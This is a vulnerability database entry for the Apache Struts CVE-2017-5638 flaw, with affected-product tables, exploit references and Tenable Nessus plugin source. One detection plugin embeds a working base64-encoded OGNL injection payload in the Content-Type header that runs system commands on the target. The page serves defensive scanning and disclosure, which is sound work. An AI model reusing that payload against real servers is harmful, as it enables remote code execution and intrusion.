Vulnerabilities > CVE-2017-5638 - Improper Handling of Exceptional Conditions vulnerability in multiple products

The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 has incorrect exception handling and error-message generation during file-upload attempts, which allows remote attackers to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, as exploited in the wild in March 2017 with a Content-Type header containing a #cmd= string.

Vulnerable Configurations

Part	Description	Count
Application	Apache Apache Struts 2.5.0 Apache Struts 2.5.1 Apache Struts 2.5.2 Apache Struts 2.5.3 Apache Struts 2.5.4 Apache Struts 2.5.5 Apache Struts 2.5.6 Apache Struts 2.5.7 Apache Struts 2.5.8 Apache Struts 2.5.9 Apache Struts 2.5.10 Apache Struts 2.2.3 Apache Struts 2.2.3.1 Apache Struts 2.3.0 Apache Struts 2.3.1 Apache Struts 2.3.1.1 Apache Struts 2.3.1.2 Apache Struts 2.3.3 Apache Struts 2.3.4 Apache Struts 2.3.4.1 Apache Struts 2.3.5 Apache Struts 2.3.6 Apache Struts 2.3.7 Apache Struts 2.3.8 Apache Struts 2.3.9 Apache Struts 2.3.10 Apache Struts 2.3.11 Apache Struts 2.3.12 Apache Struts 2.3.13 Apache Struts 2.3.14 Apache Struts 2.3.14.1 Apache Struts 2.3.14.2 Apache Struts 2.3.14.3 Apache Struts 2.3.15 Apache Struts 2.3.15.1 Apache Struts 2.3.15.2 Apache Struts 2.3.15.3 Apache Struts 2.3.16 Apache Struts 2.3.16.1 Apache Struts 2.3.16.2 Apache Struts 2.3.16.3 Apache Struts 2.3.17 Apache Struts 2.3.19 Apache Struts 2.3.20 Apache Struts 2.3.20.1 Apache Struts 2.3.20.2 Apache Struts 2.3.20.3 Apache Struts 2.3.21 Apache Struts 2.3.22 Apache Struts 2.3.23 Apache Struts 2.3.24 Apache Struts 2.3.24.1 Apache Struts 2.3.24.2 Apache Struts 2.3.24.3 Apache Struts 2.3.25 Apache Struts 2.3.26 Apache Struts 2.3.27 Apache Struts 2.3.28 Apache Struts 2.3.28.1 Apache Struts 2.3.29 Apache Struts 2.3.30 Apache Struts 2.3.31	62
Application	Hp HP Server Automation 10.0.0 HP Server Automation 10.1.0 HP Server Automation 10.2.0 HP Server Automation 10.5.0 HP Server Automation 9.1.0	5
Application	Oracle Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.2.0 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.2.1.1.0	4
Application	Arubanetworks Arubanetworks Clearpass Policy Manager - Arubanetworks Clearpass Policy Manager 3.0 Arubanetworks Clearpass Policy Manager 3.0.1 Arubanetworks Clearpass Policy Manager 3.5.1 Arubanetworks Clearpass Policy Manager 4.0 Arubanetworks Clearpass Policy Manager 5.1 Arubanetworks Clearpass Policy Manager 5.1.1 Arubanetworks Clearpass Policy Manager 5.2 Arubanetworks Clearpass Policy Manager 6.0.1 Arubanetworks Clearpass Policy Manager 6.0.2 Arubanetworks Clearpass Policy Manager 6.1 Arubanetworks Clearpass Policy Manager 6.1.1 Arubanetworks Clearpass Policy Manager 6.1.2 Arubanetworks Clearpass Policy Manager 6.1.3 Arubanetworks Clearpass Policy Manager 6.1.4 Arubanetworks Clearpass Policy Manager 6.2.0 Arubanetworks Clearpass Policy Manager 6.2.1 Arubanetworks Clearpass Policy Manager 6.2.2 Arubanetworks Clearpass Policy Manager 6.2.3 Arubanetworks Clearpass Policy Manager 6.2.4 Arubanetworks Clearpass Policy Manager 6.2.5 Arubanetworks Clearpass Policy Manager 6.2.6 Arubanetworks Clearpass Policy Manager 6.3.0 Arubanetworks Clearpass Policy Manager 6.3.0.60730 Arubanetworks Clearpass Policy Manager 6.3.1 Arubanetworks Clearpass Policy Manager 6.3.2 Arubanetworks Clearpass Policy Manager 6.3.3 Arubanetworks Clearpass Policy Manager 6.3.4 Arubanetworks Clearpass Policy Manager 6.3.5 Arubanetworks Clearpass Policy Manager 6.3.6 Arubanetworks Clearpass Policy Manager 6.4.0 Arubanetworks Clearpass Policy Manager 6.4.1 Arubanetworks Clearpass Policy Manager 6.4.2 Arubanetworks Clearpass Policy Manager 6.4.3 Arubanetworks Clearpass Policy Manager 6.4.4 Arubanetworks Clearpass Policy Manager 6.4.5 Arubanetworks Clearpass Policy Manager 6.4.6 Arubanetworks Clearpass Policy Manager 6.4.7 Arubanetworks Clearpass Policy Manager 6.5.0 Arubanetworks Clearpass Policy Manager 6.5.1 Arubanetworks Clearpass Policy Manager 6.5.2 Arubanetworks Clearpass Policy Manager 6.5.3 Arubanetworks Clearpass Policy Manager 6.5.4 Arubanetworks Clearpass Policy Manager 6.5.5 Arubanetworks Clearpass Policy Manager 6.5.6 Arubanetworks Clearpass Policy Manager 6.5.7 Arubanetworks Clearpass Policy Manager 6.6.0 Arubanetworks Clearpass Policy Manager 6.6.1 Arubanetworks Clearpass Policy Manager 6.6.2 Arubanetworks Clearpass Policy Manager 6.6.3 Arubanetworks Clearpass Policy Manager 6.6.4	55
Application	Netapp Netapp Oncommand Balance -	1
OS	Ibm IBM Storwize V3500 Firmware 7.7.1.6 IBM Storwize V3500 Firmware 7.8.1.0 IBM Storwize V5000 Firmware 7.7.1.6 IBM Storwize V5000 Firmware 7.8.1.0 IBM Storwize V7000 Firmware 7.7.1.6 IBM Storwize V7000 Firmware 7.8.1.0	6
OS	Lenovo Lenovo Storage V5030 Firmware 7.7.1.6 Lenovo Storage V5030 Firmware 7.8.1.0	2
Hardware	Ibm IBM Storwize V3500 - IBM Storwize V5000 - IBM Storwize V7000 -	3
Hardware	Lenovo Lenovo Storage V5030 -	1

Common Weakness Enumeration (CWE)

CWE-755 - Improper Handling of Exceptional Conditions

Exploit-Db

description	Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit). CVE-2017-5638. Remote exploit for Multiple platform. Tags: Metasploit Framework
file	exploits/multiple/remote/41614.rb
id	EDB-ID:41614
last seen	2017-03-15
modified	2017-03-15
platform	multiple
port	8080
published	2017-03-15
reporter	Exploit-DB
source	https://www.exploit-db.com/download/41614/
title	Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit)
type	remote

description	Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution. CVE-2017-5638. Webapps exploit for Linux platform
file	exploits/linux/webapps/41570.py
id	EDB-ID:41570
last seen	2017-03-10
modified	2017-03-07
platform	linux
port
published	2017-03-07
reporter	Exploit-DB
source	https://www.exploit-db.com/download/41570/
title	Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - Remote Code Execution
type	webapps

Metasploit

description	This module exploits a remote code execution vulnerability in Apache Struts version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed via http Content-Type header. Native payloads will be converted to executables and dropped in the server's temp dir. If this fails, try a cmd/* payload, which won't have to write to the disk.
id	MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL
last seen	2020-06-04
modified	2019-06-24
published	2017-03-09
references	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638 https://cwiki.apache.org/confluence/display/WW/S2-045
reporter	Rapid7
source	https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/struts2_content_type_ognl.rb
title	Apache Struts Jakarta Multipart Parser OGNL Injection

Nessus

NASL family	Windows
NASL id	ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL
description	Oracle WebCenter Sites component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities. - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Install (Apache Common Collections)). An unauthenticated, remote attacker can exploit this, via a crafted serialized Java object, to bypass authentication and execute arbitrary commands. (CVE-2015-7501) - An unspecified vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Server). An unauthenticated, remote attacker can exploit this, via HTTP, to obtain access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebCenter Sites. (CVE-2017-3542) - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Third Party Tools (Struts 2)) due to incorrect exception handling and error-message generation during file-upload attempts. An unauthenticated, remote attacker can exploit this, via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, to bypass authentication and execute arbitrary commands. (CVE-2017-5638) In addition, Oracle WebCenter Sites is also affected by several additional vulnerabilities including code execution, denial of service, information disclosure, and other unspecified vulnerabilities. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application
last seen	2020-06-05
modified	2020-06-01
plugin id	136998
published	2020-06-01
reporter	This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/136998
title	Oracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU)
code	# # (C) Tenable Network Security, Inc. # include('compat.inc'); if (description) { script_id(136998); script_version("1.3"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/07/27"); script_cve_id( "CVE-2015-7501", "CVE-2016-0714", "CVE-2017-3540", "CVE-2017-3541", "CVE-2017-3542", "CVE-2017-3543", "CVE-2017-3545", "CVE-2017-3554", "CVE-2017-3591", "CVE-2017-3593", "CVE-2017-3594", "CVE-2017-3595", "CVE-2017-3596", "CVE-2017-3597", "CVE-2017-3598", "CVE-2017-3602", "CVE-2017-3603", "CVE-2017-5638" ); script_xref(name:"IAVA", value:"2017-A-0113"); script_name(english:"Oracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU)"); script_set_attribute(attribute:"synopsis", value: "An application running on the remote host is affected by multiple security vulnerabilities."); script_set_attribute(attribute:"description", value: "Oracle WebCenter Sites component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities. - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Install (Apache Common Collections)). An unauthenticated, remote attacker can exploit this, via a crafted serialized Java object, to bypass authentication and execute arbitrary commands. (CVE-2015-7501) - An unspecified vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Server). An unauthenticated, remote attacker can exploit this, via HTTP, to obtain access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebCenter Sites. (CVE-2017-3542) - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Third Party Tools (Struts 2)) due to incorrect exception handling and error-message generation during file-upload attempts. An unauthenticated, remote attacker can exploit this, via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, to bypass authentication and execute arbitrary commands. (CVE-2017-5638) In addition, Oracle WebCenter Sites is also affected by several additional vulnerabilities including code execution, denial of service, information disclosure, and other unspecified vulnerabilities. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number."); script_set_attribute(attribute:"see_also", value:"https://www.oracle.com/security-alerts/cpuapr2017.html"); script_set_attribute(attribute:"solution", value: "Apply the appropriate patch according to the April 2017 Oracle Critical Patch Update advisory."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638"); script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"vuln_publication_date", value:"2017/04/18"); script_set_attribute(attribute:"patch_publication_date", value:"2017/04/18"); script_set_attribute(attribute:"plugin_publication_date", value:"2020/06/01"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware"); script_set_attribute(attribute:"stig_severity", value:"I"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Windows"); script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("oracle_webcenter_sites_installed.nbin"); script_require_keys("SMB/WebCenter_Sites/Installed"); exit(0); } port = get_kb_item('SMB/transport'); if (isnull(port)) port = 445; get_kb_item_or_exit('SMB/WebCenter_Sites/Installed'); versions = get_kb_list('SMB/WebCenter_Sites/*/Version'); if (isnull(versions)) exit(1, 'Unable to obtain a version list for Oracle WebCenter Sites.'); report = ''; foreach key (keys(versions)) { fix = ''; version = versions[key]; revision = get_kb_item(key - '/Version' + '/Revision'); path = get_kb_item(key - '/Version' + '/Path'); if (isnull(version) \|\| isnull(revision)) continue; # Patch 25883419 - 11.1.1.8.0 < Revision 184000 if (version =~ "^11\.1\.1\.8\.0$" && revision < 184000) { fix = '\n Fixed revision : 184000' + '\n Required patch : 25883419'; } # Patch 25806935 - 12.2.1.0.0 < Revision 184040 else if (version =~ "^12\.2\.1\.0\.0$" && revision < 184040) { fix = '\n Fixed revision : 184040' + '\n Required patch : 25806935'; } # Patch 25806943 - 12.2.1.1.0 < Revision 184025 else if (version =~ "^12\.2\.1\.1\.0$" && revision < 184025) { fix = '\n Fixed revision : 184025' + '\n Required patch : 25806943'; } # Patch 25806946 - 12.2.1.2.0 < Revision 184026 else if (version =~ "^12\.2\.1\.2\.0$" && revision < 184026) { fix = '\n Fixed revision : 184026' + '\n Required patch : 25806946'; } if (fix != '') { if (!isnull(path)) report += '\n Path : ' + path; report += '\n Version : ' + version + '\n Revision : ' + revision + fix + '\n'; } } if (report != '') security_report_v4(port:port, extra:report, severity:SECURITY_HOLE); else audit(AUDIT_INST_VER_NOT_VULN, "Oracle WebCenter Sites");

NASL family	CGI abuses
NASL id	STRUTS_2_5_10_1_RCE.NASL
description	The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.
last seen	2020-06-01
modified	2020-06-02
plugin id	97610
published	2017-03-08
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/97610
title	Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(97610); script_version("1.21"); script_cvs_date("Date: 2019/11/13"); script_cve_id("CVE-2017-5638"); script_bugtraq_id(96729); script_xref(name:"CERT", value:"834067"); script_xref(name:"EDB-ID", value:"41570"); script_xref(name:"EDB-ID", value:"41614"); script_name(english:"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)"); script_summary(english:"Attempts to execute arbitrary commands on the remote web server."); script_set_attribute(attribute:"synopsis", value: "The remote web server contains a web application that uses a Java framework that is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user."); script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html"); # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-045"); script_set_attribute(attribute:"solution", value: "Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later. Alternatively, apply the workaround referenced in the vendor advisory."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/06"); script_set_attribute(attribute:"patch_publication_date", value:"2017/03/06"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/08"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("http_version.nasl", "webmirror.nasl"); script_require_ports("Services/www", 80, 8080); exit(0); } include("audit.inc"); include("global_settings.inc"); include("http.inc"); include("misc_func.inc"); port = get_http_port(default:8080); cgis = get_kb_list('www/' + port + '/cgi'); urls = make_list('/'); # To identify actions that we can test the exploit on we will look # for files with the .action / .jsp / .do suffix from the KB. if (!isnull(cgis)) { foreach cgi (cgis) { match = pregmatch(pattern:"((^.)(/.+\.act(ion)?)($\|\?\|;))", string:cgi); if (match) { urls = make_list(urls, match[0]); if (!thorough_tests) break; } match2 = pregmatch(pattern:"(^.)(/.+\.jsp)$", string:cgi); if (!isnull(match2)) { urls = make_list(urls, match2[0]); if (!thorough_tests) break; } match3 = pregmatch(pattern:"(^.)(/.+\.do)$", string:cgi); if (!isnull(match3)) { urls = make_list(urls, match3[0]); if (!thorough_tests) break; } if (cgi =~ "struts2?(-rest)?-showcase") { urls = make_list(urls, cgi); if (!thorough_tests) break; } } } if (thorough_tests) { cgi2 = get_kb_list('www/' + port + '/content/extensions/act'); if (!isnull(cgi2)) urls = make_list(urls, cgi2); cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp'); if (!isnull(cgi3)) urls = make_list(urls, cgi3); cgi4 = get_kb_list('www/' + port + '/content/extensions/do'); if (!isnull(cgi4)) urls = make_list(urls, cgi4); } urls = list_uniq(urls); vuln = FALSE; rand_var = rand_str(length:8); header_payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Tenable','" + rand_var + "')}.multipart/form-data"; headers_1 = make_array("Content-Type", header_payload); # The OGNL exploit has been base64 encoded to evade AV quarantine for certain AV # vendors. # {'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','id'})) exploit = "JXsoI189J211bHRpcGFydC9mb3JtLWRhdGEnKS4oI2RtPUBvZ25sLk9nbmxDb250ZX"; exploit += "h0QERFRkFVTFRfTUVNQkVSX0FDQ0VTUykuKCNfbWVtYmVyQWNjZXNzPygjX21lbWJ"; exploit += "lckFjY2Vzcz0jZG0pOigoI2NvbnRhaW5lcj0jY29udGV4dFsnY29tLm9wZW5zeW1w"; exploit += "aG9ueS54d29yazIuQWN0aW9uQ29udGV4dC5jb250YWluZXInXSkuKCNvZ25sVXRpb"; exploit += "D0jY29udGFpbmVyLmdldEluc3RhbmNlKEBjb20ub3BlbnN5bXBob255Lnh3b3JrMi"; exploit += "5vZ25sLk9nbmxVdGlsQGNsYXNzKSkuKCNvZ25sVXRpbC5nZXRFeGNsdWRlZFBhY2t"; exploit += "hZ2VOYW1lcygpLmNsZWFyKCkpLigjb2dubFV0aWwuZ2V0RXhjbHVkZWRDbGFzc2Vz"; exploit += "KCkuY2xlYXIoKSkuKCNjb250ZXh0LnNldE1lbWJlckFjY2VzcygjZG0pKSkpLigja"; exploit += "XN3aW49KEBqYXZhLmxhbmcuU3lzdGVtQGdldFByb3BlcnR5KCdvcy5uYW1lJykudG"; exploit += "9Mb3dlckNhc2UoKS5jb250YWlucygnd2luJykpKS4oI2NtZHM9KCNpc3dpbj97J2N"; exploit += "tZC5leGUnLCcvYycsJ2lwY29uZmlnJywnL2FsbCd9OnsnYmFzaCcsJy1jJywnaWQn"; exploit += "fSkpLigjcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCNjbWRzKSkuKCNwL"; exploit += "nJlZGlyZWN0RXJyb3JTdHJlYW0odHJ1ZSkpLigjcHJvY2Vzcz0jcC5zdGFydCgpKS"; exploit += "4oI3Jvcz0oQG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEB"; exploit += "nZXRSZXNwb25zZSgpLmdldE91dHB1dFN0cmVhbSgpKSkuKEBvcmcuYXBhY2hlLmNv"; exploit += "bW1vbnMuaW8uSU9VdGlsc0Bjb3B5KCNwcm9jZXNzLmdldElucHV0U3RyZWFtKCksI"; exploit += "3JvcykpLigjcm9zLmZsdXNoKCkpfQo="; headers_2 = make_array("Content-Type", chomp(base64_decode(str:exploit))); # Since struts apps could be taking longer timeout = get_read_timeout() * 2; if(timeout < 10) timeout = 10; http_set_read_timeout(timeout); foreach url (urls) { ############################################ # Method 1 ############################################ res = http_send_recv3( method : "GET", item : url, port : port, add_headers : headers_1, exit_on_fail : TRUE ); if ( ("X-Tenable: "+ rand_var ) >< res[1] ) vuln = TRUE; # Stop after first vulnerable Struts app is found if (vuln) break; ############################################ # Method 2 ############################################ cmd_pats = make_array(); cmd_pats['id'] = "uid=[0-9]+.\sgid=[0-9]+."; cmd_pats['ipconfig'] = "Subnet Mask\|Windows IP\|IP(v(4\|6)?)? Address"; res = http_send_recv3( method : "GET", item : url, port : port, add_headers : headers_2, exit_on_fail : TRUE ); if ("Windows IP" >< res[2] \|\| "uid" >< res[2]) { if (pgrep(pattern:cmd_pats['id'], string:res[2])) { output = strstr(res[2], "uid"); if (!empty_or_null(output)) { vuln = TRUE; vuln_url = build_url(qs:url, port:port); break; } } else if (pgrep(pattern:cmd_pats['ipconfig'], string:res[2])) { output = strstr(res[2], "Windows IP"); if (!empty_or_null(output)) { vuln = TRUE; vuln_url = build_url(qs:url, port:port); break; } } } } if (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.'); security_report_v4( port : port, severity : SECURITY_HOLE, generic : TRUE, request : make_list(http_last_sent_request()), output : chomp(output) );

NASL family	Misc.
NASL id	STRUTS_2_5_10_1_WIN_LOCAL.NASL
description	The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code. Note that Nessus has not tested for this issue but has instead relied only on the application
last seen	2020-06-01
modified	2020-06-02
plugin id	97576
published	2017-03-07
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/97576
title	Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(97576); script_version("1.21"); script_cvs_date("Date: 2019/11/13"); script_cve_id("CVE-2017-5638"); script_bugtraq_id(96729); script_xref(name:"CERT", value:"834067"); script_xref(name:"EDB-ID", value:"41570"); script_xref(name:"EDB-ID", value:"41614"); script_name(english:"Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)"); script_summary(english:"Checks the Struts 2 version."); script_set_attribute(attribute:"synopsis", value: "The remote host contains a web application that uses a Java framework that is affected by a remote code execution vulnerability."); script_set_attribute(attribute:"description", value: "The version of Apache Struts running on the remote host is 2.3.5 through 2.3.31 or else 2.5.x prior to 2.5.10.1. It is, therefore, affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to potentially execute arbitrary code. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number."); script_set_attribute(attribute:"see_also", value:"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html"); # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/ script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?77e9c654"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-045"); script_set_attribute(attribute:"see_also", value:"https://cwiki.apache.org/confluence/display/WW/S2-046"); script_set_attribute(attribute:"solution", value: "Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later. Alternatively, apply the workaround referenced in the vendor advisory."); script_set_attribute(attribute:"agent", value:"all"); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-5638"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploited_by_malware", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Apache Struts Jakarta Multipart Parser OGNL Injection'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"in_the_news", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2017/03/06"); script_set_attribute(attribute:"patch_publication_date", value:"2017/03/06"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/03/07"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"combined"); script_set_attribute(attribute:"cpe", value:"cpe:/a:apache:struts"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Misc."); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("os_fingerprint.nasl", "struts_detect_win.nbin", "struts_detect_nix.nbin", "struts_config_browser_detect.nbin"); script_require_keys("Settings/ParanoidReport"); script_require_ports("installed_sw/Apache Struts", "installed_sw/Struts"); exit(0); } include("vcf.inc"); if (report_paranoia < 2) audit(AUDIT_PARANOID); app_info = vcf::combined_get_app_info(app:"Apache Struts"); vcf::check_granularity(app_info:app_info, sig_segments:2); constraints = [ { "min_version" : "2.3.5", "max_version" : "2.3.31", "fixed_version" : "2.3.32" }, { "min_version" : "2.5", "max_version" : "2.5.10", "fixed_version" : "2.5.10.1" } ]; vcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);

NASL family	Misc.
NASL id	ORACLE_WEBLOGIC_SERVER_CPU_APR_2017.NASL
description	The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the Apache Struts component due to improper handling of multithreaded access to an ActionForm instance. An unauthenticated, remote attacker can exploit this, via a specially crafted multipart request, to execute arbitrary code or cause a denial of service condition. (CVE-2016-1181) - An unspecified flaw exists in the Web Services subcomponent that allows an unauthenticated, remote attacker to modify or delete arbitrary data accessible to the server. (CVE-2017-3506) - A remote code execution vulnerability exists in the Web Container subcomponent due to improper handling of reflected PartItem File requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code. (CVE-2017-3531) - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers. An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)
last seen	2020-06-01
modified	2020-06-02
plugin id	99528
published	2017-04-21
reporter	This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99528
title	Oracle WebLogic Server Multiple Vulnerabilities (April 2017 CPU)
